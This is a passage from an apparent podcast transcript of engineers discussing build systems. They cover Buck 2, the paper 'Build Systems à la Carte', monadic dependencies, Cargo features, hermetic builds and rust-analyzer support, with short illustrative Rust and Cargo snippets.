I did all my research, and I was like, wow, these are the papers that I want, and I really like the work of these authors. And then I discovered Buck 2, and I was like, oh my god, Meta paid the people that wrote those papers to implement them, and it's already in Rust even, so never mind. And so I have not used it on meaningful projects yet, which is why, with all of Rain's experience, I deflected the question there.

Speaker 4:

But that's how I got into this: doing all that research, seeing all those bodies, and looking at what I thought was the best current theoretical setup for all of this. But, yeah, I've not really used them in production, in anger, let's say, yet.

Speaker 1:

And so, Rain, this is a very interesting paper. This is "Build Systems à la Carte." Tell me a bit about this paper.

Speaker 5:

So, I believe that this is the paper that Steve was alluding to. Is that right?

Speaker 4:

It is. It is definitely one of the critical papers that I'm referring to. Like, I started actively converting the code in it to Rust one day.

Speaker 5:

Yeah. So this paper is really interesting, because it's written by this kind of overlap between academia and industry. And one of the authors is Simon Peyton Jones.

Speaker 1:

That's right. Exactly.

Speaker 3:

We know where this is going.

Speaker 5:

So what they did is that they ended up looking at build systems as used at various places. You know, something like GNU Make, which is an early example of a build system. Sorry, Make fans. And then it also looks at Bazel, Buck, and so on. And finally, in a really inspired choice, I think, it looks at Excel, because Excel is also a build system, in the sense that it has a whole execution graph of: here are the cells that depend on these other cells.

Speaker 1:

You mean Excel, the spreadsheet? I'm like, this must be a different Excel. You actually mean the spreadsheet.

Speaker 5:

Yes. Yes. And,

Speaker 1:

Adam just passed out. I think Adam...

Speaker 2:

I'm so excited right now.

Speaker 1:

So I think, like, actually, the folks

Speaker 5:

at Microsoft Research have been really interested in Excel, because in a sense it is the world's most commonly used programming language, and it is orders of magnitude more popular than anything that any of us in industry use. And so they ended up looking at Excel as well, through the same lens. And they found that you could categorize all these build systems in a whole bunch of ways. So they look at four prototypical build systems: Make, Excel, Shake, and Bazel.

Speaker 5:

And they look at what kind of scheduler these build systems have. Another crucial distinction is whether dependencies are static or dynamic; in other words, can nodes in the action graph create more nodes within them, so that a step can produce more steps. And it also looks at things like whether you can share results, like distributed caching. They call that the cloud column.

Speaker 5:

So if you look at page 6, there's a really nice chart showing that. I think this is a really good way to look at it, because it also suggests places where various build systems fall short, or the trade-offs that build systems make. And I think one of the big trade-offs in practice does end up being the static-versus-dynamic dependency distinction. Because, who here is a fan of monads? Some build systems don't let you create these additional dependencies, and some build systems do. And the build systems that do, in academic circles, are actually called monadic build systems, because they behave like a monad.

Speaker 5:

Because a monad is essentially the ability for each individual thing to create more things of that kind. So, you know, I think just looking at it through that lens makes a lot of sense. And Buck 2 is really designed in a very principled fashion, where it tries to make sure that it can use cloud caches and so on. It tries to use static dependencies as much as possible, but it also has an escape hatch for dynamic dependencies, and so on. So it's pretty neat.
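[As a toy sketch of that distinction, loosely after the paper's framing (the task and key names here are invented): a static task can declare its full dependency list up front, while a dynamic, "monadic" task only reveals its next dependency after inspecting a value it has already fetched.]

```rust
// Static ("applicative"): the whole dependency list is known before
// anything runs, so a build system can plan, parallelize, and cache it.
struct StaticTask {
    deps: Vec<&'static str>,
}

// Dynamic ("monadic"): the task asks for inputs *while running*, so the
// dependency graph is only discovered by executing it.
struct DynamicTask {
    run: Box<dyn Fn(&dyn Fn(&str) -> String) -> String>,
}

fn main() {
    let _static_task = StaticTask { deps: vec!["lib.rs", "main.rs"] };

    // This task reads "config" first, and only then knows which other
    // key it depends on: a step producing more steps.
    let dynamic_task = DynamicTask {
        run: Box::new(|fetch| {
            let profile = fetch("config");
            fetch(&format!("flags-{profile}"))
        }),
    };

    // A stand-in "store" that a real build system would provide.
    let store = |key: &str| match key {
        "config" => "release".to_string(),
        "flags-release" => "-O2".to_string(),
        _ => String::new(),
    };
    println!("{}", (dynamic_task.run)(&store)); // prints "-O2"
}
```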

Speaker 5:

I think, you know, this paper basically very directly inspired Buck 2, just by the ability to categorize the properties of a build system in all these ways.

Speaker 2:

Now, Rain, tell me if this is accurate, but it may bring it full circle. I was asking David Tolnay about Buck 2 and how it deals with features. He just said: we don't. Exactly. Like, the features?

Speaker 2:

The end.

Speaker 3:

Yes. Yes.

Speaker 5:

Yes. And that is one of those places where, in an open source environment, the ability to specify features like in Cargo is very, very useful. But Buck 2 is so designed for the megacorp. Like, we all agree on a shared set of libraries and features. And so, yeah.

Speaker 5:

So Buck 2 just does not have support for features, and that would be a blocker for us to use it. Or we'd have to think very hard about what we need out of Buck.

Speaker 1:

What does it mean that Buck 2 does not support features? I'm just, I'm

Speaker 5:

So the way Buck 2 works... so right now, you know, we use features. These are Cargo features, right? These are optional flags that turn on or off various parts of the codebase. In a single crate, you can see cfg(feature = "serde"), right, as an example.
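[For readers following along, here is roughly what such a feature gate looks like on the Cargo side; the crate layout and struct are hypothetical:]

```toml
# Cargo.toml -- an optional dependency gated behind a feature flag
[dependencies]
serde = { version = "1", features = ["derive"], optional = true }

[features]
default = []
serde = ["dep:serde"]
```

```rust
// Compiled only when built with `--features serde`; downstream crates
// choose per-build whether to pay for this code at all.
#[cfg(feature = "serde")]
#[derive(serde::Serialize, serde::Deserialize)]
pub struct Config {
    pub name: String,
}
```

[Cargo unifies such flags across a workspace at build time, which is exactly the degree of freedom Buck-style systems trade away.]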

Speaker 5:

And that lets you pull in the serde crate. You can turn it off if you don't need the serde feature, and so on. And Bazel, sorry, Bazel as well as Buck, don't actually let you say those sorts of things. So you have to say up front: either I need the serde feature, or I don't need the serde feature.

Speaker 5:

And that's actually great, because at that point the whole workspace-hack thing becomes not an issue at all, right? So that gives you some real advantages.

Speaker 1:

Yeah, I mean, no need to unify features if there's no feature support at all. So yeah.

Speaker 3:

Makes sense.

Speaker 5:

Exactly. So that's one of those trade-offs. Buck has a very opinionated model of how it wants the world to be.

Speaker 1:

Yeah. That's really interesting. And then the flip side of that is what it buys you around building at scale and compile times, and a bunch of other advantages to hermetic builds, of course. So, yeah. It's a trade-off.

Speaker 1:

It's a balance, as with all these things.

Speaker 4:

One funny situation with all of this right now is that Buck 2 is actually not hermetic by default, but that's basically a bug. Me and several other people who recently got into it were like, oh, we're so glad you made this design choice, because it makes for a much easier on-ramp to get started: you don't need to be fully hermetic, and then when you do a remote build, it must actually be fully hermetic. And they were like, yeah, we actually thought that was a bug, and we're planning on removing that possibility.

Speaker 4:

And so I still think that's going to happen, but it's, again, an example of that friction, and the ways you can deal with it, or not, in different ways.

Speaker 1:

Yeah. Interesting. And in terms of how you get that on-ramp, I do think it's definitely interesting. I think about these totally different ways of thinking about the build system, and can we possibly move from one to the other?

Speaker 1:

Because it does feel like it's a very big decision and requires a lot of investment. So, as Rain said, it would not be light for us to move to Buck 2.

Speaker 5:

Yeah.

Speaker 1:

There'd need to be a big payoff at the end. We are using Buck 2 right now; our current use of Buck 2, or what will be a use of Buck 2 anyway, is around FPGA synthesis. It's looking promising there.

Speaker 5:

Yeah. And another one that occurred to me, since rust-analyzer came up: I don't believe that, at the moment, rust-analyzer works with Buck 2. It

Speaker 4:

has gotten way, way better; you hesitated for correct reasons. Specifically, David Barsky has been working on this a lot lately, and I don't believe it is perfect, but it has significantly improved over the last six months, let's say.

Speaker 5:

Okay. That's awesome.

Speaker 1:

But, yeah,

Speaker 4:

You're also not wrong in the sense of what you were saying earlier, right? For tools that expect Cargo and are used to invoking Cargo to do the things they need to do, there needs to be some sort of layer there, and that's complexity.

Speaker 1:

Yep. Yeah. Well, build times are obviously extremely important. It's all around that developer flow and getting that feedback quickly. Rust gives us so much, and it also gives us the challenge of figuring out how to make our builds faster.

Speaker 1:

So there's a lot we can go do. It's been a terrific discussion. Sean has obviously done terrific work on our own builds; Rain, all of your terrific work on Hakari, getting that integrated, and getting to the root cause of this stuff. And, Steve, obviously, as you said up at the top, build systems have been a really important part of your work for a long time. So this was fun.

Speaker 1:

And, Adam: Excel is a build system. I mean, you can

Speaker 2:

Love it.

Speaker 1:

Yeah. Didn't have that in the cards, but glad to check that off the bingo card. Exactly. Awesome. Well, this was a great discussion.

Speaker 1:

Thank you, everyone. And I know it's been a relief for everyone to have a discussion in which we didn't mention AI once. So, good going. I was tempted a couple of times. I tell you, I was really very tempted. Well,

Speaker 5:

I know Facebook has started to use AI to figure out which builds to run and so on. But, there you go. That can be another thing.

Speaker 1:

There we go. I knew we were going there. Yeah. I know. I just did it.

Speaker 1:

I just did the thing I said I was gonna do. Alright. On that note, thanks everybody. Talk to you next time.
